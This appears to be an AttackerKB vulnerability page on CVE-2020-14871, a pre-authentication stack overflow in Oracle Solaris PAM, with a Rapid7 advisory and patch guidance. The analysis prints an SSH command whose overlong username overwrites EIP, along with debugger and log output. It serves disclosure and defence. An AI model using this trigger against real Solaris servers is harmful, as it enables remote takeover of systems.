Very High
CVE-2020-14871
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Very High
(2 users assessed)High
(2 users assessed)Unknown
Unknown
Unknown
CVE-2020-14871
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
Vulnerability in the Oracle Solaris product of Oracle Systems (component: Pluggable authentication module). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Solaris. Note: This CVE is not exploitable for Solaris 11.1 and later releases, and ZFSSA 8.7 and later releases, thus the CVSS Base Score is 0.0. CVSS 3.1 Base Score 10.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
Likely pre-auth RCE via stack overflow in PAM username parsing. Simply provide an overlong username, and PAM does an over copy into a stack buffer.
Bug being discussed in open source offshoots for Solaris here: https://illumos.topicbox.com/groups/developer/T4da539ebf8f90156/urgent-cve-2020-14871
But they’re not sure if it’s actually related to this commit https://github.com/illumos/illumos-gate/commit/1d276e0b382cf066dae93640746d8b4c54d15452, or if it’s a different bug. My money is on the former. https://www.illumos.org/issues/13242
ZDNet article referencing exploitation in the wild: https://www.zdnet.com/article/hacker-group-uses-solaris-zero-day-to-breach-corporate-networks/
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportRatings
-
Attacker ValueVery High
-
ExploitabilityMedium
Technical Analysis
Quick screenshot from yesterday showing EIP
control:
Please see the Rapid7 analysis.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportCVSS V3 Severity and Metrics
General Information
Vendors
- oracle
Products
- solaris,
- solaris 9
Exploited in the Wild
Would you like to delete this Exploited in the Wild Report?
Yes, delete this report- Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)
- News Article or Blog (https://www.mandiant.com/resources/live-off-the-land-an-overview-of-unc1945)
- Other: Tenable Report (https://www.tenable.com/blog/cve-2020-14871-critical-buffer-overflow-in-oracle-solaris-exploited-in-the-wild-as-zero-day)
Would you like to delete this Exploited in the Wild Report?
Yes, delete this reportReferences
Miscellaneous
Additional Info
Technical Analysis
Description
On Tuesday, October 20, as part of its October 2020 Critical Patch Update (CPU), Oracle published an advisory on CVE-2020-14871, a critical stack-based buffer overflow vulnerability in the Pluggable Authentication Module (PAM) component of Oracle Solaris. The vulnerability is easily exploitable over SSH, though not limited to it; successful exploitation could allow an unauthenticated, remote attacker to completely take over a vulnerable Solaris server. CVE-2020-14871 carries a CVSSv3 base score of 10.0.
On Monday, November 2, FireEye released research from Mandiant regarding their investigation of threat actor UNC1945, which allegedly targeted Oracle Solaris systems. Mandiant observed the use of a zero-day (0day) exploit against Solaris, allowing the threat actor to establish a foothold on affected systems. Mandiant disclosed the zero-day vulnerability to Oracle as CVE-2020-14871.
On the same day, security researcher Hacker Fantastic revealed technical details about CVE-2020-14871 and provided a proof-of-concept (PoC) exploit demonstrating the vulnerability. Hacker Fantastic noted that the keyboard-interactive
authentication method needed to be enabled in SunSSH or OpenSSH in order to reach the vulnerable code.
On Wednesday, November 4, FireEye published their own blog post containing technical information about the vulnerability.
Affected products
FireEye lists the following affected products:
- Solaris 9 (some releases)
- Solaris 10 (all releases)
- Solaris 11.0
- Illumos (OpenIndiana 2020.04)
Rapid7 confirms that while Solaris 11.1 and later are vulnerable, the vulnerable code is not reachable via SSH due to username truncation. Thus, CVE-2020-14871 appears not to be exploitable over SSH in later versions of Solaris.
Rapid7 analysis
Rapid7 was able to reproduce the vulnerability against SunSSH 1.1.5 on Solaris 10. An empty username and long string of characters are used to trigger the vulnerability. The OpenSSH ssh(1)
client can trivially perform the attack.
wvu@kharak:~$ ssh -vvvo StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o PreferredAuthentications=keyboard-interactive -l "" 172.28.128.13 [snip] debug1: Remote protocol version 2.0, remote software version Sun_SSH_1.1.5 [snip] debug1: Authenticating to 172.28.128.13:22 as '' [snip] debug3: preferred keyboard-interactive debug3: authmethod_lookup keyboard-interactive debug3: remaining preferred: debug3: authmethod_is_enabled keyboard-interactive debug1: Next authentication method: keyboard-interactive debug2: userauth_kbdint debug3: send packet: type 50 debug2: we sent a keyboard-interactive packet, wait for reply debug3: receive packet: type 60 debug2: input_userauth_info_req debug2: input_userauth_info_req: num_prompts 1 Please enter user name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC debug3: send packet: type 61 Connection closed by 172.28.128.13 port 22 wvu@kharak:~$
Sending a test payload of 512 A
characters, 4 B
characters, and 4 C
characters will overwrite the username buffer, saved frame pointer (EBP
), and saved return address (EIP
) on the stack, respectively. This creates a SIGSEGV
or segmentation fault crash in the target process, which can be seen below in the GDB debugger.
Program received signal SIGSEGV, Segmentation fault. 0x43434343 in ?? () (gdb) i r eax 0x0 0 ecx 0x0 0 edx 0x0 0 ebx 0xfeea6000 -18194432 esp 0x80433b0 0x80433b0 ebp 0x42424242 0x42424242 esi 0x80c6c28 135031848 edi 0x0 0 eip 0x43434343 0x43434343 eflags 0x10246 [ PF ZF IF RF ] cs 0x3b 59 ss 0x43 67 ds 0x43 67 es 0x43 67 fs 0x0 0 gs 0x1c3 451 (gdb)
EIP
, otherwise known as the pointer to the current program instruction, now points to 0x43434343
, which is CCCC
in ASCII—a value we control. Since we control EIP
, we control the flow of execution in the process. This is the first step toward remote code execution (RCE).
The enhanced SSH and PAM logs confirm the crash:
Nov 4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug1: userauth-request for user service ssh-connection method keyboard-interactive Nov 4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug1: attempt 1 initial attempt 0 failures 1 initial failures 0 Nov 4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug2: input_userauth_request: try method keyboard-interactive Nov 4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug1: keyboard-interactive devs Nov 4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug2: Starting PAM service sshd-kbdint for method keyboard-interactive Nov 4 18:06:28 unknown sshd[4524]: [ID 974518 auth.debug] PAM[4524]: pam_set_item(80c6c28:conv) Nov 4 18:06:28 unknown sshd[4524]: [ID 834998 auth.debug] PAM[4524]: pam_end(80c6c28): status = Conversation failure Nov 4 18:06:28 unknown sshd[4524]: [ID 242859 auth.debug] PAM[4524]: pam_start(sshd-kbdint,,80a98a8:80c6c28) - debug = 1 Nov 4 18:06:28 unknown sshd[4524]: [ID 974518 auth.debug] PAM[4524]: pam_set_item(80c6c28:service) Nov 4 18:06:28 unknown sshd[4524]: [ID 974518 auth.debug] PAM[4524]: pam_set_item(80c6c28:user) Nov 4 18:06:28 unknown sshd[4524]: [ID 974518 auth.debug] PAM[4524]: pam_set_item(80c6c28:conv) Nov 4 18:06:28 unknown sshd[4524]: [ID 974518 auth.debug] PAM[4524]: pam_set_item(80c6c28:rhost) Nov 4 18:06:28 unknown sshd[4524]: [ID 974518 auth.debug] PAM[4524]: pam_set_item(80c6c28:tty) Nov 4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug2: Calling pam_authenticate() Nov 4 18:06:28 unknown sshd[4524]: [ID 799171 auth.debug] PAM[4524]: pam_authenticate(80c6c28, 0) Nov 4 18:06:28 unknown sshd[4524]: [ID 185033 auth.debug] PAM[4524]: load_modules(80c6c28, pam_sm_authenticate)=/usr/lib/security/pam_authtok_get.so.1 Nov 4 18:06:28 unknown sshd[4524]: [ID 176833 auth.debug] PAM[4524]: load_function: successful load of pam_sm_authenticate Nov 4 18:06:28 unknown sshd[4524]: [ID 185033 auth.debug] PAM[4524]: load_modules(80c6c28, pam_sm_authenticate)=/usr/lib/security/pam_dhkeys.so.1 Nov 4 18:06:28 unknown sshd[4524]: [ID 176833 auth.debug] PAM[4524]: load_function: successful load of pam_sm_authenticate Nov 4 18:06:28 unknown sshd[4524]: [ID 185033 auth.debug] PAM[4524]: load_modules(80c6c28, pam_sm_authenticate)=/usr/lib/security/pam_unix_cred.so.1 Nov 4 18:06:28 unknown sshd[4524]: [ID 176833 auth.debug] PAM[4524]: load_function: successful load of pam_sm_authenticate Nov 4 18:06:28 unknown sshd[4524]: [ID 185033 auth.debug] PAM[4524]: load_modules(80c6c28, pam_sm_authenticate)=/usr/lib/security/pam_unix_auth.so.1 Nov 4 18:06:28 unknown sshd[4524]: [ID 176833 auth.debug] PAM[4524]: load_function: successful load of pam_sm_authenticate Nov 4 18:06:28 unknown sshd[4524]: [ID 174974 auth.debug] PAM[4524]: pam_get_user(80c6c28, 80c6c28, NULL) Nov 4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug2: PAM echo on prompt: Please enter user name: Nov 4 18:06:28 unknown sshd[4524]: [ID 800047 auth.debug] debug2: Nesting dispatch_run loop Nov 4 18:06:28 unknown sshd[4334]: [ID 800047 auth.debug] debug2: channel 0: rcvd adjust 49401 Nov 4 18:06:54 unknown sshd[4524]: [ID 800047 auth.debug] debug1: got 1 responses Nov 4 18:06:54 unknown sshd[4524]: [ID 800047 auth.debug] debug2: Nested dispatch_run loop exited Nov 4 18:06:54 unknown sshd[4524]: [ID 800047 auth.debug] debug1: PAM conv function returns PAM_SUCCESS Nov 4 18:07:16 unknown genunix: [ID 603404 kern.notice] NOTICE: core_log: sshd[4524] core dumped: /var/cores/sshd.unknown.4524.1604534834.core Nov 4 18:07:16 unknown sshd[4523]: [ID 800047 auth.debug] monitor debug1: child closed the communication pipe before user auth was finished Nov 4 18:07:16 unknown sshd[4523]: [ID 800047 auth.debug] monitor debug1: Calling cleanup 0x807e79a(0x0)
Furthermore, a core dump of the process memory is deposited on the filesystem. Its standard location is /core
and was changed for this test case.
root@unknown:/# file /var/cores/sshd.unknown.4524.1604534834.core /var/cores/sshd.unknown.4524.1604534834.core: ELF 32-bit LSB core file 80386 Version 1, from 'sshd' root@unknown:/#
Rapid7 researchers were able to prove RCE. We believe attackers will be able to weaponize this vulnerability quickly.
Guidance
Oracle Solaris customers should apply Oracle’s patch for Solaris 10 and 11 immediately. Solaris 9 is no longer supported and has not received a patch. We recommend upgrading to a supported release.
As a partial mitigation, Solaris administrators may disable the keyboard-interactive
authentication method in SunSSH or OpenSSH, preventing the PAM vulnerability from being reachable via SSH. This can be accomplished by setting KbdInteractiveAuthentication
and ChallengeResponseAuthentication
to no
in /etc/ssh/sshd_config
and restarting the SSH service.
References
- https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html
- https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html
- https://twitter.com/hackerfantastic/status/1323431512822435841
- https://www.oracle.com/security-alerts/cpuoct2020.html
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
PoC development thread https://twitter.com/hackerfantastic/status/1323431512822435841
Thanks, Brent!
I can confirm RCE. Thanks for the notes!